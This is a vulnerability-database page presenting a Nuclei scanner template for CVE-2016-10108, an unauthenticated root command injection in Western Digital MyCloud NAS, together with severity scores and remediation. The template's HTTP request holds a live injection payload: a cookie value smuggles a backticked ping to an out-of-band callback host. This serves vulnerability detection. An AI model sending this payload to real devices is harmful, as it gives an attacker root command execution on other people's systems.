Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10108
HistoryAug 28, 2023 - 11:42 p.m.

Western Digital MyCloud NAS - Command Injection

2023-08-2823:42:23
ProjectDiscovery
github.com
8
western_digital
mycloud_nas
command_injection
remote_execution
vulnerability
firmware_update
unauthorized_access
data_loss
network_compromise
cve-2016-10108
packetstorm
cvss
cwe-77

9.7 High

AI Score

Confidence

High

0.846 High

EPSS

Percentile

98.5%

Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
id: CVE-2016-10108

info:
  name: Western Digital MyCloud NAS - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
  reference:
    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108
    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
    - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10108
    cwe-id: CWE-77
    epss-score: 0.86242
    epss-percentile: 0.98335
    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: western_digital
    product: mycloud_nas
    shodan-query: http.favicon.hash:-1074357885
  tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1

    matchers:
      - type: dsl
        dsl:
          - contains(body, "WDMyCloud")
          - contains(interactsh_protocol, "dns")
          - status_code == 200
        condition: and
# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950

9.7 High

AI Score

Confidence

High

0.846 High

EPSS

Percentile

98.5%